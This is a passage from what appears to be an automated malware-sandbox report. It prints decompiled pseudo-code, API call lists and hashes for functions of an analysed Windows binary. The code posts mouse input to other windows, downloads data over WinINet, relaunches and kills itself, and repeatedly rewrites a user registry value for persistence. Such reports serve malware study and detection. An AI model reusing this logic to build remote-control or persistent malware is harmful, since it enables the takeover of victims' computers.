													_t173 = GetParent(_t251);
													if(_t173 != 0) {
														_t251 = _t173;
													}
												}
											}
											if(_t251 == 0) {
												L46:
												_t145 = _v84;
												if(_t145 != 0) {
													_t145 = IsWindow(_t145);
													if(_t145 == 0 || _t251 != 0 && _v84 != _t251 && (_v80 & 0x00000007) == 0) {
														if(_t190 != 0x8001) {
															_t145 = E004272D0(0, _t254, 0, 0, 1);
														}
													} else {
														_t251 = _v84;
														_v88 = 1;
													}
												}
												goto L54;
											} else {
												_t145 = E004260D0(_t251);
												if((_t145 & 0x00000040) == 0) {
													goto L46;
												}
												if(_t251 != _v84) {
													_t145 = E004272D0(_t251, _t254, GetWindowThreadProcessId(_t251, 0), 0, 1);
												}
												_v88 = 1;
												L54:
												if(_t251 == 0) {
													goto L89;
												}
												_v64.cbSize = 0x3c;
												_t145 = GetWindowInfo(_t251,  &_v64);
												if(_t145 == 0) {
													goto L89;
												}
												_t145 = _a8 & 0x0000ffff;
												_t194 = (_a12 & 0x0000ffff) << 0x00000010 | _t145;
												_v84 = _t194;
												if(_v88 != 1) {
													_t194 = _v68;
												} else {
													_t145 = E004260D0(_t251);
													if((_t145 & 0x00000020) == 0) {
														_t145 = _a8 - _v64.rcClient;
														_t194 = (_a12 - _v40 & 0x0000ffff) << 0x00000010 | _t145 & 0x0000ffff;
													}
												}
												if(_v76 == 0) {
													if((_a4 & 0x00000004) == 0) {
														goto L65;
													}
													_push(_v84);
													_push(_t194);
													_push(0xa2);
													_push(_v88);
													_t166 = 0x202;
													goto L64;
												} else {
													_push(_v84);
													_push(_t194);
													_push(0xa1);
													_push(_v88);
													_t166 = 0x201;
													L64:
													_push( &_v64);
													_t145 = E004275A0(_t166, _t254);
													L65:
													if(_v72 == 0) {
														if((_a4 & 0x00000040) == 0) {
															L70:
															if(_v68 == 0) {
																if((_a4 & 0x00000010) == 0) {
																	L75:
																	if((_a4 & 0x00000001) != 0) {
																		_push(_v84);
																		_push(_t194);
																		_push(0xa0);
																		_push(_v88);
																		_push( &_v64);
																		_t145 = E004275A0(0x200, _t254);
																	}
																	if((_a4 & 0x00000800) != 0) {
																		_t256 =  *((intOrPtr*)(_t254 + 0x10));
																		_t156 = 0;
																		if(( *(_t256 + 1) & 0x00000080) != 0) {
																			_t156 = 1;
																		}
																		if(( *(_t256 + 2) & 0x00000080) != 0) {
																			_t156 = _t156 | 0x00000002;
																		}
																		if(( *(_t256 + 4) & 0x00000080) != 0) {
																			_t156 = _t156 | 0x00000010;
																		}
																		if(( *(_t256 + 0x10) & 0x00000080) != 0) {
																			_t156 = _t156 | 0x00000004;
																		}
																		if(( *(_t256 + 0x11) & 0x00000080) != 0) {
																			_t156 = _t156 | 0x00000008;
																		}
																		_t145 = PostMessageW(_t251, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | _t156 & 0x0000ffff, _v84);
																	}
																	goto L89;
																}
																_push(_v84);
																_push(_t194);
																_push(0xa5);
																_push(_v88);
																_t160 = 0x205;
																L74:
																_push( &_v64);
																_t145 = E004275A0(_t160, _t254);
																goto L75;
															}
															_push(_v84);
															_push(_t194);
															_push(0xa4);
															_push(_v88);
															_t160 = 0x204;
															goto L74;
														}
														_push(_v84);
														_push(_t194);
														_push(0xa8);
														_push(_v88);
														_t163 = 0x208;
														L69:
														_push( &_v64);
														_t145 = E004275A0(_t163, _t254);
														goto L70;
													}
													_push(_v84);
													_push(_t194);
													_push(0xa7);
													_push(_v88);
													_t163 = 0x207;
													goto L69;
												}
											}
										}
										_t174 = 0;
										L34:
										E004265F0(_t174, _t254, 2);
										goto L35;
									}
									_t174 = 1;
									goto L34;
								}
								_t176 = 0;
								L29:
								E004265F0(_t176, _t254, 4);
								goto L30;
							}
							_t176 = 1;
							goto L29;
						}
						_t178 = 0;
						_t245 = 1;
						L24:
						E004265F0(_t178, _t254, _t245);
						goto L25;
					}
					_t178 = 1;
					_t245 = 1;
					goto L24;
				}
			}

0x004278bb
0x004278bd
0x004278c0
0x004278c3
0x004278ce
0x0042794b
0x00427951
0x00427957
0x0042798d
0x0042798d
0x00427990
0x00000000
0x00427990
0x00427959
0x0042795f
0x00427961
0x00427961
0x0042796a
0x0042796c
0x0042796c
0x00427973
0x00427975
0x00427975
0x0042797c
0x0042797e
0x0042797e
0x00427985
0x00427987
0x00427987
0x0042798a
0x00000000
0x004278d0
0x004278d0
0x004278d6
0x004278e0
0x004278e5
0x004278e8
0x004278e8
0x004278ee
0x004278fa
0x00427900
0x00427903
0x0042790b
0x00427914
0x0042791d
0x00427928
0x00427937
0x00427943
0x00427943
0x00427937
0x00427994
0x0042799a
0x004279a3
0x004279a6
0x004279ae
0x00427cae
0x00427cb4
0x00427cb4
0x004279b6
0x004279b9
0x004279bd
0x004279c8
0x004279d5
0x004279d7
0x004279da
0x004279de
0x004279e7
0x004279f4
0x004279f6
0x004279f9
0x004279fd
0x00427a06
0x00427a13
0x00427a32
0x00427a3e
0x00427a43
0x00427a4e
0x00427a68
0x00427a70
0x00427a72
0x00427a72
0x00427a70
0x00427a4e
0x00427a76
0x00427aa8
0x00427aa8
0x00427aae
0x00427ab1
0x00427ab9
0x00427ae0
0x00427aea
0x00427aea
0x00427acc
0x00427acc
0x00427ad0
0x00427ad0
0x00427ab9
0x00000000
0x00427a78
0x00427a7a
0x00427a81
0x00000000
0x00000000
0x00427a87
0x00427a99
0x00427a99
0x00427a9e
0x00427aef
0x00427af1
0x00000000
0x00000000
0x00427afd
0x00427b05
0x00427b0d
0x00000000
0x00000000
0x00427b17
0x00427b1e
0x00427b25
0x00427b29
0x00427b51
0x00427b2b
0x00427b2d
0x00427b34
0x00427b43
0x00427b4d
0x00427b4d
0x00427b34
0x00427b5a
0x00427b77
0x00000000
0x00000000
0x00427b81
0x00427b82
0x00427b83
0x00427b88
0x00427b89
0x00000000
0x00427b5c
0x00427b64
0x00427b65
0x00427b66
0x00427b6b
0x00427b6c
0x00427b8e
0x00427b92
0x00427b97
0x00427b9c
0x00427ba1
0x00427bbe
0x00427be3
0x00427be8
0x00427c05
0x00427c2a
0x00427c2e
0x00427c38
0x00427c39
0x00427c3a
0x00427c3f
0x00427c44
0x00427c4e
0x00427c4e
0x00427c5a
0x00427c5c
0x00427c5f
0x00427c65
0x00427c67
0x00427c67
0x00427c70
0x00427c72
0x00427c72
0x00427c79
0x00427c7b
0x00427c7b
0x00427c82
0x00427c84
0x00427c84
0x00427c8b
0x00427c8d
0x00427c8d
0x00427ca8
0x00427ca8
0x00000000
0x00427c5a
0x00427c0f
0x00427c10
0x00427c11
0x00427c16
0x00427c17
0x00427c1c
0x00427c20
0x00427c25
0x00000000
0x00427c25
0x00427bf2
0x00427bf3
0x00427bf4
0x00427bf9
0x00427bfa
0x00000000
0x00427bfa
0x00427bc8
0x00427bc9
0x00427bca
0x00427bcf
0x00427bd0
0x00427bd5
0x00427bd9
0x00427bde
0x00000000
0x00427bde
0x00427bab
0x00427bac
0x00427bad
0x00427bb2
0x00427bb3
0x00000000
0x00427bb3
0x00427b5a
0x00427a76
0x00427a08
0x00427a0a
0x00427a0e
0x00000000
0x00427a0e
0x004279ff
0x00000000
0x004279ff
0x004279e9
0x004279eb
0x004279ef
0x00000000
0x004279ef
0x004279e0
0x00000000
0x004279e0
0x004279ca
0x004279cc
0x004279ce
0x004279d0
0x00000000
0x004279d0
0x004279bf
0x004279c1
0x00000000
0x004279c1

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004278FA
ReleaseMutex.KERNEL32(?), ref: 00427928
IsWindow.USER32(?), ref: 0042792F
PostMessageW.USER32(?,00000215,00000000,00000000), ref: 00427943
GetWindowLongW.USER32(00000000,000000F0), ref: 00427A43
GetParent.USER32(00000000), ref: 00427A68
GetWindowThreadProcessId.USER32(?,00000000), ref: 00427A8C
GetWindowInfo.USER32 ref: 00427B05

Part of subcall function 00427350: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,004278E5), ref: 00427363
Part of subcall function 00427350: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,004278E5), ref: 00427381
Part of subcall function 00427350: GetWindowRect.USER32 ref: 00427391
Part of subcall function 00427350: IsRectEmpty.USER32(?), ref: 00427414
Part of subcall function 00427350: GetWindowLongW.USER32(?,000000F0), ref: 00427425
Part of subcall function 00427350: GetParent.USER32(?), ref: 0042743A
Part of subcall function 00427350: MapWindowPoints.USER32 ref: 00427443
Part of subcall function 00427350: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C,?,?,?,?,?,?,?,004278E5), ref: 00427469

IsWindow.USER32(?), ref: 00427AB1
PostMessageW.USER32(00000000,0000020A,?,?), ref: 00427CA8

Strings

<, xrefs: 00427AFD
@, xrefs: 00427BBA

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: <$@
API String ID: 3705211839-1426351568
Opcode ID: fe0fc4a1f282392f8f2005970487983fa3a80dd361cb3006e2f9bfcc633b22a5
Instruction ID: b9061d52e2b6dc0c7c6ca2de3649f700c848a13209ae29920eb0622225c8673a
Opcode Fuzzy Hash: fe0fc4a1f282392f8f2005970487983fa3a80dd361cb3006e2f9bfcc633b22a5
Instruction Fuzzy Hash: 5EC1EEB03083519BE324CF28E884B6B77E4AF85314F888A2EF8A5873D1C778D841C759

Uniqueness

Uniqueness Score: -1.00%

Function 0040B560, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 137
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040B560(long* __eax, void** __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v28;
				void* _v44;
				char _v52;
				void* _v56;
				char _v57;
				intOrPtr _v64;
				signed int _v72;
				char _v73;
				intOrPtr _v81;
				void* _t23;
				void* _t25;
				void* _t26;
				void* _t32;
				void* _t34;
				void* _t41;
				intOrPtr _t42;
				void* _t53;
				long* _t64;
				void** _t69;
				void* _t71;

				_t64 = __eax;
				_t69 = __ecx;
				ResetEvent(_a8);
				_t23 = HeapAlloc( *0x42e6d4, 8, 0x1004);
				_t41 = _t23;
				if(_t41 != 0) {
					__imp__InternetSetStatusCallbackW(_a4, E0040B4E0);
					_v56 = _t23;
					 *_t69 = 0;
					 *_t64 = 0;
					_v57 = 1;
					_t25 = E00410870( &_v52,  &_v52, 0, 0x28);
					_v64 = 0x28;
					_v44 = _t41;
					while(1) {
						L3:
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4,  &_v52, 8, 0);
						if(_t25 == 0) {
							break;
						}
						_t26 = _v44;
						if(_t26 != 0) {
							_t53 =  *_t64 + _t26;
							_t32 =  *_t69;
							if(_t53 != 0) {
								_push(_t53 + 4);
								if(_t32 != 0) {
									_t34 = HeapReAlloc( *0x42e6d4, 8, _t32, ??);
								} else {
									_t34 = HeapAlloc( *0x42e6d4, 8, ??);
								}
								if(_t34 == 0) {
									L17:
									_v73 = 0;
								} else {
									 *_t69 = _t34;
									goto L16;
								}
							} else {
								if(_t32 != 0) {
									HeapFree( *0x42e6d4, 0, _t32);
								}
								 *_t69 = 0;
								L16:
								E00410820( *_t69 +  *_t64, _t41, _v44);
								_t25 = _v56;
								 *_t64 = _t25 +  *_t64;
								continue;
							}
						}
						L18:
						_t18 = _v72 + 1; // 0x1
						asm("sbb ecx, ecx");
						__imp__InternetSetStatusCallbackW(_a4,  ~_t18 & _v72);
						HeapFree( *0x42e6d4, 0, _t41);
						_t42 = _v81;
						if(_t42 == 0) {
							_t71 =  *_t69;
							if(_t71 != 0) {
								HeapFree( *0x42e6d4, 0, _t71);
							}
						}
						return _t42;
						goto L22;
					}
					if(GetLastError() != 0x3e5) {
						goto L17;
					} else {
						_t25 = E004156D0( &_a8);
						goto L3;
					}
					goto L18;
				} else {
					return 0;
				}
				L22:
			}

0x0040b56c
0x0040b572
0x0040b574
0x0040b588
0x0040b58e
0x0040b592
0x0040b5a8
0x0040b5b0
0x0040b5bb
0x0040b5c1
0x0040b5c7
0x0040b5cc
0x0040b5d1
0x0040b5d9
0x0040b5e0
0x0040b5e0
0x0040b5ed
0x0040b5f5
0x0040b5fd
0x00000000
0x00000000
0x0040b61b
0x0040b621
0x0040b625
0x0040b627
0x0040b629
0x0040b64a
0x0040b64d
0x0040b669
0x0040b64f
0x0040b658
0x0040b658
0x0040b671
0x0040b690
0x0040b690
0x0040b673
0x0040b673
0x00000000
0x0040b673
0x0040b62b
0x0040b62d
0x0040b639
0x0040b639
0x0040b63f
0x0040b675
0x0040b680
0x0040b685
0x0040b689
0x00000000
0x0040b689
0x0040b629
0x0040b695
0x0040b69c
0x0040b6a1
0x0040b6a7
0x0040b6bc
0x0040b6be
0x0040b6c4
0x0040b6c6
0x0040b6ca
0x0040b6d6
0x0040b6d6
0x0040b6ca
0x0040b6e0
0x00000000
0x0040b6e0
0x0040b60a
0x00000000
0x0040b610
0x0040b614
0x00000000
0x0040b614
0x00000000
0x0040b594
0x0040b59c
0x0040b59c
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 0040B574
HeapAlloc.KERNEL32(?,00000008,00001004), ref: 0040B588
InternetSetStatusCallbackW.WININET(?,0040B4E0), ref: 0040B5A8
InternetReadFileExA.WININET ref: 0040B5F5
GetLastError.KERNEL32 ref: 0040B5FF
HeapFree.KERNEL32(?,00000000,?), ref: 0040B639
HeapAlloc.KERNEL32(?,00000008), ref: 0040B658
InternetSetStatusCallbackW.WININET(?,00000001), ref: 0040B6A7
HeapFree.KERNEL32(?,00000000,00000000), ref: 0040B6BC
HeapFree.KERNEL32(?,00000000), ref: 0040B6D6

Strings

(, xrefs: 0040B5D1

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeInternet$AllocCallbackStatus$ErrorEventFileLastReadReset
String ID: (
API String ID: 1804432496-3887548279
Opcode ID: 0dbe69b3d4efdbbf3a02e238a53a46fbec4a70d88d0f98d5311a00ebc111775b
Instruction ID: ab7d25f95fa8cb55c83245189734e94b5c9bc1cd706bf4337ef9838c26cad16c
Opcode Fuzzy Hash: 0dbe69b3d4efdbbf3a02e238a53a46fbec4a70d88d0f98d5311a00ebc111775b
Instruction Fuzzy Hash: BA41AE71200205ABD324DF65DC85F6B77A8EB98304F50493EF981EB2D0DB75E804CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041BEB0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123
synchronizationmemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041BEB0() {
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t35;
				void* _t44;
				void* _t45;
				void* _t52;
				void* _t65;
				void** _t66;
				intOrPtr _t67;
				void* _t68;
				void* _t69;

				_t67 =  *((intOrPtr*)(_t68 + 0x5fc));
				_t21 =  *(_t67 + 0x180);
				if(_t21 == 0 || WaitForSingleObject(_t21, 0) != 0x102) {
					_t22 =  *(_t67 + 0x180);
					_t66 = _t67 + 0x17c;
					if(_t22 != 0) {
						CloseHandle(_t22);
					}
					_t23 =  *_t66;
					_t73 = _t23;
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					E00410870(_t23, _t66, 0, 0x10);
					_t64 = _t68 + 0xd8;
					E0041D210(1, _t68 + 0xd8);
					E0041D150(_t68 + 0x2e0);
					E00410870(E00416E10(0x42eb70, _t68 + 0x36c,  *0x42e904, _t68 + 0x74, 0), _t68 + 0x30, 0, 0x44);
					 *((intOrPtr*)(_t68 + 0x2c)) = 0x44;
					 *((intOrPtr*)(_t68 + 0x34)) = _t68 + 0x70;
					ResetEvent( *(_t67 + 0xc));
					_push(L"-v");
					_t35 = E00411DC0(_t73, _t68 + 0x1c, L"\"%s\" %s", _t64);
					_t69 = _t68 + 0x10;
					if(_t35 <= 0) {
						L16:
						return 0;
					} else {
						_t65 =  *(_t69 + 0x14);
						_t52 = E00412B40(_t69 + 0x2c, _t69 + 0x1c, _t65, 0);
						if(_t65 != 0) {
							HeapFree( *0x42e6d4, 0, _t65);
						}
						if(_t52 == 0) {
							goto L16;
						} else {
							E00410820(_t66, _t69 + 0x1c, 0x10);
							if(WaitForSingleObject( *(_t67 + 0xc), 0x3e8) == 0) {
								goto L17;
							} else {
								TerminateProcess( *_t66, 0);
								_t44 = _t66[1];
								if(_t44 != 0) {
									CloseHandle(_t44);
								}
								_t45 =  *_t66;
								if(_t45 != 0) {
									_t45 = CloseHandle(_t45);
								}
								E00410870(_t45, _t66, 0, 0x10);
								goto L16;
							}
						}
					}
				} else {
					L17:
					return 1;
				}
			}

0x0041beb8
0x0041bebf
0x0041bec9
0x0041bedf
0x0041bee5
0x0041beed
0x0041bef0
0x0041bef0
0x0041bef6
0x0041bef8
0x0041befa
0x0041befd
0x0041befd
0x0041bf08
0x0041bf0d
0x0041bf19
0x0041bf25
0x0041bf57
0x0041bf64
0x0041bf6c
0x0041bf70
0x0041bf76
0x0041bf88
0x0041bf8d
0x0041bf92
0x0041c013
0x0041c01f
0x0041bf94
0x0041bf94
0x0041bfa9
0x0041bfad
0x0041bfb9
0x0041bfb9
0x0041bfc1
0x00000000
0x0041bfc3
0x0041bfcb
0x0041bfe1
0x00000000
0x0041bfe3
0x0041bfe8
0x0041bfee
0x0041bff3
0x0041bff6
0x0041bff6
0x0041bffc
0x0041c000
0x0041c003
0x0041c003
0x0041c00e
0x00000000
0x0041c00e
0x0041bfe1
0x0041bfc1
0x0041c025
0x0041c025
0x0041c02e
0x0041c02e

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,?,?,77426AF0), ref: 0041BECE
CloseHandle.KERNEL32(?,?,?,?,77426AF0), ref: 0041BEF0
CloseHandle.KERNEL32(?,?,?,?,77426AF0), ref: 0041BEFD
ResetEvent.KERNEL32(?,00000000,00000000), ref: 0041BF70
HeapFree.KERNEL32(?,00000000,?,00000000,?,?,?,77426AF0), ref: 0041BFB9
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,00000000,?,?,?,77426AF0), ref: 0041BFD9
TerminateProcess.KERNEL32(?,00000000,?,?,?,77426AF0), ref: 0041BFE8
CloseHandle.KERNEL32(?,?,00000000,?,?,?,77426AF0), ref: 0041BFF6
CloseHandle.KERNEL32(?,?,00000000,?,?,?,77426AF0), ref: 0041C003

Strings

pB, xrefs: 0041BF44
"%s" %s, xrefs: 0041BF82
D, xrefs: 0041BF64

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$ObjectSingleWait$EventFreeHeapProcessResetTerminate
String ID: "%s" %s$D$pB
API String ID: 160799-2325083392
Opcode ID: f726d7da8469988cd2f717a1e489e627e0bf806277f2863a0ee7cfd934227047
Instruction ID: 9544458144c1ad98f5ef39895b3123b30db02e77d2dba738327293e52d91d0c1
Opcode Fuzzy Hash: f726d7da8469988cd2f717a1e489e627e0bf806277f2863a0ee7cfd934227047
Instruction Fuzzy Hash: 0141D771240305ABD730AF65DD85FDB779CAB84700F04482EBA44E7291DB78E945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB40, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 110
synchronizationregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040EB40(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t32;
				long _t37;
				int _t39;
				long _t41;
				WCHAR* _t65;
				signed int _t66;
				void* _t72;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				SetThreadPriority(GetCurrentThread(), 0);
				_t72 = E0041CDD0(_t75, 0x19367402, 1);
				 *(_t74 + 8) = _t72;
				if(_t72 != 0) {
					E0041D150(_t74 + 0x2dc);
					E00416E10(0x42eb70, _t74 + 0x368,  *0x42e904, _t74 + 0x74, 0);
					_t65 = _t74 + 0xd4;
					E0041D210(1, _t65);
					PathQuoteSpacesW(_t65);
					_t66 = 0;
					__eflags =  *(_t74 + 0xd4);
					if( *(_t74 + 0xd4) != 0) {
						do {
							_t66 = _t66 + 1;
							__eflags =  *((short*)(_t74 + 0xd4 + _t66 * 2));
						} while ( *((short*)(_t74 + 0xd4 + _t66 * 2)) != 0);
					}
					_t32 = WaitForSingleObject( *0x42edbc, 0);
					__eflags = _t32;
					if(_t32 != 0) {
						E00424100(3, _t74 + 0x18);
						_t37 = WaitForSingleObject( *0x42edbc, 0xc8);
						__eflags = _t37 - 0x102;
						if(_t37 == 0x102) {
							do {
								 *(_t74 + 0x34) = 0x80000001;
								_t39 = RegCreateKeyExW(0x80000001, _t74 + 0x34, 0, 0, 0, 2, 0, _t74 + 0x14, 0);
								__eflags = _t39;
								if(_t39 == 0) {
									_t16 = _t66 + 2; // 0x2
									RegSetValueExW( *(_t74 + 0x14), _t74 + 0x84, _t39, 1, _t74 + 0xdc, _t66 + _t16);
									RegCloseKey( *(_t74 + 0x10));
								}
								_t41 = WaitForSingleObject( *0x42edbc, 0xc8);
								__eflags = _t41 - 0x102;
							} while (_t41 == 0x102);
							_t72 =  *(_t74 + 0x14);
						}
					}
					ReleaseMutex(_t72);
					CloseHandle(_t72);
					__eflags = 0;
					return 0;
				} else {
					_t2 = _t72 + 1; // 0x1
					return _t2;
				}
			}

0x0040eb40
0x0040eb50
0x0040eb62
0x0040eb64
0x0040eb6a
0x0040eb82
0x0040eba6
0x0040ebab
0x0040ebb7
0x0040ebbf
0x0040ebc5
0x0040ebc7
0x0040ebcf
0x0040ebd1
0x0040ebd1
0x0040ebd2
0x0040ebd2
0x0040ebd1
0x0040ebeb
0x0040ebed
0x0040ebef
0x0040ebff
0x0040ec10
0x0040ec12
0x0040ec17
0x0040ec30
0x0040ec4b
0x0040ec53
0x0040ec55
0x0040ec57
0x0040ec59
0x0040ec76
0x0040ec7d
0x0040ec7d
0x0040ec8a
0x0040ec90
0x0040ec90
0x0040ec97
0x0040ec97
0x0040ec9b
0x0040ec9d
0x0040eca4
0x0040ecac
0x0040ecb5
0x0040eb6c
0x0040eb6c
0x0040eb76
0x0040eb76

APIs

GetCurrentThread.KERNEL32 ref: 0040EB49
SetThreadPriority.KERNEL32(00000000), ref: 0040EB50

Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39

PathQuoteSpacesW.SHLWAPI(?,?,?,00000000,?,?,19367402,00000001), ref: 0040EBBF
WaitForSingleObject.KERNEL32(?,00000000,?,?,19367402,00000001), ref: 0040EBEB
WaitForSingleObject.KERNEL32(?,000000C8,?,?,?,19367402,00000001), ref: 0040EC10
RegCreateKeyExW.ADVAPI32(80000001,00000000), ref: 0040EC53
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000002), ref: 0040EC76
RegCloseKey.ADVAPI32(?), ref: 0040EC7D
WaitForSingleObject.KERNEL32(?,000000C8), ref: 0040EC8A
ReleaseMutex.KERNEL32(00000000,?,?,19367402,00000001), ref: 0040EC9D
CloseHandle.KERNEL32(00000000,?,?,19367402,00000001), ref: 0040ECA4

Strings

pB, xrefs: 0040EBA1

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$Close$CreateHandleMutexThread$CurrentPathPriorityQuoteReleaseSpacesValue
String ID: pB
API String ID: 1763125157-3059159000
Opcode ID: 30d7019010dfa39569445249e9bc314420156b944bd2f1d8ccbfc958b785f38b
Instruction ID: a4c82942e19672011408771ac4bf210ff6bac47aad49e3b947c89c636e09cf14
Opcode Fuzzy Hash: 30d7019010dfa39569445249e9bc314420156b944bd2f1d8ccbfc958b785f38b
Instruction Fuzzy Hash: 8631F371204305ABE320EB91ED85FEB77A9EB88700F00482EF645B72D0DB74E945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004264F0, Relevance: 21.1, APIs: 14, Instructions: 93
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004264F0(void** __eax, char _a4) {
				void* _t16;
				void* _t17;
				long _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct HDC__* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void** _t47;
				void** _t48;

				_t47 = __eax;
				_t16 =  *(__eax + 0x1c);
				if(_t16 != 0) {
					DeleteObject(_t16);
				}
				_t17 = _t47[3];
				if(_t17 != 0) {
					CloseHandle(_t17);
				}
				_t18 = _t47[1];
				if(_t18 != 0xffffffff) {
					TlsFree(_t18);
				}
				_t19 = _t47[5];
				if(_t19 != 0) {
					CloseHandle(_t19);
				}
				_t20 = _t47[4];
				if(_t20 != 0) {
					UnmapViewOfFile(_t20);
				}
				_t21 =  *_t47;
				if(_t21 != 0) {
					_t21 = CloseHandle(_t21);
				}
				if(_a4 != 0) {
					_t22 = _t47[0x56];
					if(_t22 != 0) {
						SelectObject(_t47[0x55], _t22);
					}
					_t23 = _t47[0x57];
					if(_t23 != 0) {
						DeleteObject(_t23);
					}
					_t24 = _t47[0x55];
					if(_t24 != 0) {
						DeleteDC(_t24);
					}
					_t25 = _t47[0x58];
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					_t26 = _t47[0x60];
					if(_t26 != 0 && WaitForSingleObject(_t26, 0) != 0x102) {
						PostThreadMessageW(_t47[0x62], 0x12, 0, 0);
					}
					_t27 = _t47[0x60];
					_t48 =  &(_t47[0x5f]);
					if(_t27 != 0) {
						CloseHandle(_t27);
					}
					_t28 =  *_t48;
					if(_t28 != 0) {
						_t28 = CloseHandle(_t28);
					}
					_t21 = E00410870(_t28, _t48, 0, 0x10);
				}
				return _t21;
			}

0x004264f8
0x004264fa
0x00426500
0x00426503
0x00426503
0x00426505
0x00426510
0x00426513
0x00426513
0x00426515
0x0042651b
0x0042651e
0x0042651e
0x00426524
0x00426529
0x0042652c
0x0042652c
0x0042652e
0x00426533
0x00426536
0x00426536
0x0042653c
0x00426540
0x00426543
0x00426543
0x0042654a
0x00426550
0x00426558
0x00426562
0x00426562
0x00426568
0x00426570
0x00426573
0x00426573
0x00426575
0x0042657d
0x00426580
0x00426580
0x00426586
0x0042658e
0x00426591
0x00426591
0x00426593
0x0042659b
0x004265ba
0x004265ba
0x004265c0
0x004265c6
0x004265ce
0x004265d1
0x004265d1
0x004265d3
0x004265d7
0x004265da
0x004265da
0x004265e1
0x004265e1
0x004265e9

APIs

DeleteObject.GDI32(?), ref: 00426503
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426513
TlsFree.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042651E
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 0042652C
UnmapViewOfFile.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426536
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426543
SelectObject.GDI32(?,?), ref: 00426562
DeleteObject.GDI32(?), ref: 00426573
DeleteDC.GDI32(?), ref: 00426580
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 00426591
WaitForSingleObject.KERNEL32(?,00000000,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265A0
PostThreadMessageW.USER32 ref: 004265BA
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265D1
CloseHandle.KERNEL32(?,00000000,0042EEA0,00000000,0042677F,00000000,00000000,?,?,00000000), ref: 004265DA

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Object$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 2298219652-0
Opcode ID: 1e0a588af1f79f3f1d754791a5225ff9b86dddd822111cc8cdc33f7246667bfd
